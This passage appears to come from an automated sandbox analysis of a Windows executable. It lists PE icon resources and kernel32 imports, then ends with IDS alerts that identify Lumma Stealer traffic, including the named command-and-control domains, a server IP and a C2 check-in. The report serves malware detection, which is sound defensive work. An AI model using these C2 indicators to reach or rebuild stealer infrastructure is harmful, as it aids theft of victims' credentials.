                                                                              RT_ICON0xfa55e80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.3569672131147541
                                                                              RT_ICON0xfa5f700x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.4734042553191489
                                                                              RT_ICON0xfa63d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.2950207468879668
                                                                              RT_ICON0xfa89800x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.33653846153846156
                                                                              RT_ICON0xfa9a280x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.39467213114754096
                                                                              RT_ICON0xfaa3b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.425531914893617
                                                                              RT_ICON0xfaa8180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.29678423236514523
                                                                              RT_ICON0xfacdc00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.32786116322701686
                                                                              RT_ICON0xfade680x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.37131147540983606
                                                                              RT_ICON0xfae7f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.45478723404255317
                                                                              RT_ICON0xfaec580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.18724066390041494
                                                                              RT_ICON0xfb12000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.25375234521575984
                                                                              RT_ICON0xfb22a80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.28852459016393445
                                                                              RT_ICON0xfb2c300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.3404255319148936
                                                                              RT_ICON0xfb30980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.23568464730290456
                                                                              RT_ICON0xfb56400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.275328330206379
                                                                              RT_ICON0xfb66e80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.3155737704918033
                                                                              RT_ICON0xfb70700x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.3820921985815603
                                                                              RT_ICON0xfb74d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.3
                                                                              RT_ICON0xfb9a800x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.38320825515947465
                                                                              RT_ICON0xfbab280x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.40737704918032785
                                                                              RT_ICON0xfbb4b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.4601063829787234
                                                                              RT_ICON0xfbb9180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.28651452282157674
                                                                              RT_ICON0xfbdec00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.324577861163227
                                                                              RT_ICON0xfbef680x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.3897540983606557
                                                                              RT_ICON0xfbf8f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.3980496453900709
                                                                              RT_ICON0xfbfd580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.24885892116182573
                                                                              RT_ICON0xfc23000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.19301125703564728
                                                                              RT_ICON0xfc33a80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.18401639344262294
                                                                              RT_ICON0xfc3d300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.2553191489361702
                                                                              RT_ICON0xfc41980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.11390041493775933
                                                                              RT_ICON0xfc67400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.15900562851782363
                                                                              RT_ICON0xfc77e80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.2069672131147541
                                                                              RT_ICON0xfc81700x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.26684397163120566
                                                                              RT_ICON0xfc85d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.1607883817427386
                                                                              RT_ICON0xfcab800x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.2521106941838649
                                                                              RT_ICON0xfcbc280x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.29262295081967216
                                                                              RT_ICON0xfcc5b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.41312056737588654
                                                                              RT_ICON0xfcca180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.1821576763485477
                                                                              RT_ICON0xfcefc00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.24296435272045028
                                                                              RT_ICON0xfd00680x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.28647540983606556
                                                                              RT_ICON0xfd09f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.36347517730496454
                                                                              RT_ICON0xfd0e580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.14325726141078837
                                                                              RT_ICON0xfd34000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.18339587242026267
                                                                              RT_ICON0xfd44a80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.21024590163934426
                                                                              RT_ICON0xfd4e300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.2721631205673759
                                                                              RT_ICON0xfd52980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.2533195020746888
                                                                              RT_ICON0xfd78400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.3348968105065666
                                                                              RT_ICON0xfd88e80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.3540983606557377
                                                                              RT_ICON0xfd92700x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.475177304964539
                                                                              RT_ICON0xfd96d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.23827800829875517
                                                                              RT_ICON0xfdbc800x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.3133208255159475
                                                                              RT_ICON0xfdcd280x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.30655737704918035
                                                                              RT_ICON0xfdd6b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.42730496453900707
                                                                              RT_ICON0xfddb180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.24927385892116183
                                                                              RT_ICON0xfe00c00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.20333020637898686
                                                                              RT_ICON0xfe11680x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.19508196721311474
                                                                              RT_ICON0xfe1af00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.30230496453900707
                                                                              RT_ICON0xfe1f580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.23734439834024895
                                                                              RT_ICON0xfe45000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.2732176360225141
                                                                              RT_ICON0xfe55a80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.28688524590163933
                                                                              RT_ICON0xfe5f300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.34308510638297873
                                                                              RT_ICON0xfe63980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.19398340248962656
                                                                              RT_ICON0xfe89400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.20614446529080677
                                                                              RT_ICON0xfe99e80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.2610655737704918
                                                                              RT_ICON0xfea3700x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.2969858156028369
                                                                              RT_ICON0xfea7d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.22313278008298756
                                                                              RT_ICON0xfecd800x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.25140712945590993
                                                                              RT_ICON0xfede280x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.3155737704918033
                                                                              RT_ICON0xfee7b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.36436170212765956
                                                                              RT_ICON0xfeec180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.2216804979253112
                                                                              RT_ICON0xff11c00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.24413696060037524
                                                                              RT_ICON0xff22680x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.30040983606557375
                                                                              RT_ICON0xff2bf00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.35726950354609927
                                                                              RT_ICON0xff30580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.14948132780082987
                                                                              RT_ICON0xff56000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.19301125703564728
                                                                              RT_ICON0xff66a80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.21598360655737706
                                                                              RT_ICON0xff70300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.2872340425531915
                                                                              RT_ICON0xff74980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.2316390041493776
                                                                              RT_ICON0xff9a400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.28353658536585363
                                                                              RT_ICON0xffaae80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.3418032786885246
                                                                              RT_ICON0xffb4700x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.40425531914893614
                                                                              RT_ICON0xffb8d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.22603734439834025
                                                                              RT_ICON0xffde800x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.33677298311444653
                                                                              RT_ICON0xffef280x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.31024590163934423
                                                                              RT_ICON0xfff8b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.4051418439716312
                                                                              RT_ICON0xfffd180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.2200207468879668
                                                                              RT_ICON0x10022c00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.2603189493433396
                                                                              RT_ICON0x10033680x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.30778688524590164
                                                                              RT_ICON0x1003cf00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.26595744680851063
                                                                              RT_ICON0x10041580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.21950207468879668
                                                                              RT_ICON0x10067000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.27157598499061913
                                                                              RT_ICON0x10077a80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.3155737704918033
                                                                              RT_ICON0x10081300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.22872340425531915
                                                                              RT_ICON0x10085980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.23817427385892115
                                                                              RT_ICON0x100ab400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.2521106941838649
                                                                              RT_ICON0x100bbe80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.29180327868852457
                                                                              RT_ICON0x100c5700x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.39361702127659576
                                                                              RT_ICON0x100c9d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.3642116182572614
                                                                              RT_ICON0x100ef800x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.39352720450281425
                                                                              RT_ICON0x10100280x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.48811475409836064
                                                                              RT_ICON0x10109b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.45656028368794327
                                                                              RT_ICON0x1010e180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.2619294605809129
                                                                              RT_ICON0x10133c00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.31308630393996245
                                                                              RT_ICON0x10144680x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.37131147540983606
                                                                              RT_ICON0x1014df00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.40602836879432624
                                                                              RT_ICON0x10152580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.2149377593360996
                                                                              RT_ICON0x10178000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.2150562851782364
                                                                              RT_ICON0x10188a80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.2647540983606557
                                                                              RT_ICON0x10192300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.30407801418439717
                                                                              RT_ICON0x10196980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.22095435684647302
                                                                              RT_ICON0x101bc400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.2856472795497186
                                                                              RT_ICON0x101cce80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.33524590163934426
                                                                              RT_ICON0x101d6700x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.450354609929078
                                                                              RT_ICON0x101dad80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.2008298755186722
                                                                              RT_ICON0x10200800x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.2643058161350844
                                                                              RT_ICON0x10211280x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.31926229508196724
                                                                              RT_ICON0x1021ab00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.4228723404255319
                                                                              RT_ICON0x1021f180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.24553941908713692
                                                                              RT_ICON0x10244c00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.3196529080675422
                                                                              RT_ICON0x10255680x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.37991803278688524
                                                                              RT_ICON0x1025ef00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.4645390070921986
                                                                              RT_ICON0x10263580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.22780082987551867
                                                                              RT_ICON0x10289000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.2530487804878049
                                                                              RT_ICON0x10299a80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.26721311475409837
                                                                              RT_ICON0x102a3300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.3191489361702128
                                                                              RT_ICON0x102a7980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.26141078838174275
                                                                              RT_ICON0x102cd400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.31590056285178236
                                                                              RT_ICON0x102dde80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.3274590163934426
                                                                              RT_ICON0x102e7700x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.42730496453900707
                                                                              RT_ICON0x102ebd80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.23786307053941907
                                                                              RT_ICON0x10311800x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.3173076923076923
                                                                              RT_ICON0x10322280x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.3295081967213115
                                                                              RT_ICON0x1032bb00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.46187943262411346
                                                                              RT_ICON0x10330180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.23184647302904565
                                                                              RT_ICON0x10355c00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.31848030018761725
                                                                              RT_ICON0x10366680x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.33401639344262296
                                                                              RT_ICON0x1036ff00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.4530141843971631
                                                                              RT_ICON0x10374580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.2142116182572614
                                                                              RT_ICON0x1039a000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.24624765478424016
                                                                              RT_ICON0x103aaa80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.2774590163934426
                                                                              RT_ICON0x103b4300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.38120567375886527
                                                                              RT_ICON0x103b8980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.27645228215767637
                                                                              RT_ICON0x103de400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.32387429643527205
                                                                              RT_ICON0x103eee80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.38114754098360654
                                                                              RT_ICON0x103f8700x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.3900709219858156
                                                                              RT_ICON0x103fcd80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0GermanGermany0.23858921161825727
                                                                              RT_ICON0x10422800x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0GermanGermany0.3123827392120075
                                                                              RT_ICON0x10433280x988Device independent bitmap graphic, 24 x 48 x 32, image size 0GermanGermany0.3516393442622951
                                                                              RT_ICON0x1043cb00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0GermanGermany0.48936170212765956
                                                                              RT_ICON0x10441180x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishUnited States0.16666666666666666
                                                                              RT_ICON0x10444000x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States0.375
                                                                              RT_ICON0x10445280x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.4949421965317919
                                                                              RT_ICON0x1044a900x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.47297297297297297
                                                                              RT_ICON0x1044bb80x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.4356936416184971
                                                                              RT_ICON0x10451200x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.34459459459459457
                                                                              RT_ICON0x10452480x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.4653179190751445
                                                                              RT_ICON0x10457b00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.38513513513513514
                                                                              RT_ICON0x10458d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.4833815028901734
                                                                              RT_ICON0x1045e400x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.46283783783783783
                                                                              RT_ICON0x1045f680x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.4638728323699422
                                                                              RT_ICON0x10464d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.38513513513513514
                                                                              RT_ICON0x10465f80x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.4472543352601156
                                                                              RT_ICON0x1046b600x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.42567567567567566
                                                                              RT_ICON0x1046c880x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.45447976878612717
                                                                              RT_ICON0x10471f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.3885135135135135
                                                                              RT_ICON0x10473180x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.4523121387283237
                                                                              RT_ICON0x10478800x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.42567567567567566
                                                                              RT_GROUP_ICON0x10479a80x4cdataGermanGermany0.7894736842105263
                                                                              RT_GROUP_ICON0x10479f40x3edataGermanGermany0.8548387096774194
                                                                              RT_GROUP_ICON0x1047a340x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x1047a740x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x1047ab40x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x1047af40x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x1047b340x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x1047b740x3edataGermanGermany0.8548387096774194
                                                                              RT_GROUP_ICON0x1047bb40x3edataGermanGermany0.8709677419354839
                                                                              RT_GROUP_ICON0x1047bf40x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x1047c340x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x1047c740x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x1047cb40x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x1047cf40x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x1047d340x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x1047d740x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x1047db40x14dataGermanGermany1.25
                                                                              RT_GROUP_ICON0x1047dc80x14dataGermanGermany1.25
                                                                              RT_GROUP_ICON0x1047ddc0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x1047e1c0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x1047e5c0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x1047e9c0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x1047edc0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x1047f1c0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x1047f5c0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x1047f9c0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x1047fdc0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x104801c0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x104805c0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x104809c0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x10480dc0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x104811c0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x104815c0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x104819c0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x10481dc0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x104821c0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x104825c0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x104829c0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x10482dc0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x104831c0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x104835c0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x104839c0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x10483dc0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x104841c0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x104845c0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x104849c0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x10484dc0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x104851c0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x104855c0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x104859c0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x10485dc0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x104861c0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x104865c0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x104869c0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x10486dc0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x104871c0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x104875c0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x104879c0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x10487dc0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x104881c0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x104885c0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x104889c0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x10488dc0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x104891c0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x104895c0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x104899c0x3edataGermanGermany0.8387096774193549
                                                                              RT_GROUP_ICON0x10489dc0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x1048a1c0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x1048a5c0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x1048a9c0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x1048adc0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x1048b1c0x3edataGermanGermany0.8870967741935484
                                                                              RT_GROUP_ICON0x1048b5c0x22dataEnglishUnited States1.0588235294117647
                                                                              RT_GROUP_ICON0x1048b800x22dataEnglishUnited States1.1470588235294117
                                                                              RT_GROUP_ICON0x1048ba40x22dataEnglishUnited States1.1470588235294117
                                                                              RT_GROUP_ICON0x1048bc80x22dataEnglishUnited States1.1470588235294117
                                                                              RT_GROUP_ICON0x1048bec0x22dataEnglishUnited States1.1470588235294117
                                                                              RT_GROUP_ICON0x1048c100x22dataEnglishUnited States1.1470588235294117
                                                                              RT_GROUP_ICON0x1048c340x22dataEnglishUnited States1.1176470588235294
                                                                              RT_GROUP_ICON0x1048c580x22dataEnglishUnited States1.1470588235294117
                                                                              RT_GROUP_ICON0x1048c7c0x22dataEnglishUnited States1.1470588235294117
                                                                              RT_VERSION0x1048ca00x2bcdataGermanGermany0.46285714285714286
                                                                              RT_MANIFEST0x1048f5c0x45bXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (1055), with CRLF line terminatorsEnglishUnited States0.4896860986547085
                                                                              DLLImport
                                                                              kernel32.dllWriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateEventA, CloseHandle, AddVectoredExceptionHandler
                                                                              Language of compilation systemCountry where language is spokenMap
                                                                              GermanGermany
                                                                              EnglishUnited States
                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2024-09-29T00:49:18.990662+02002056174ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (trustterwowqm .shop)1192.168.2.6593241.1.1.153UDP
                                                                              2024-09-29T00:49:19.077754+02002056164ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop)1192.168.2.6600331.1.1.153UDP
                                                                              2024-09-29T00:49:19.574914+02002056165ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI)1192.168.2.649715104.21.4.136443TCP
                                                                              2024-09-29T00:49:19.735138+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649715104.21.4.136443TCP
                                                                              2024-09-29T00:49:19.735138+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649715104.21.4.136443TCP
                                                                              2024-09-29T00:49:20.390732+02002056165ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI)1192.168.2.649716104.21.4.136443TCP
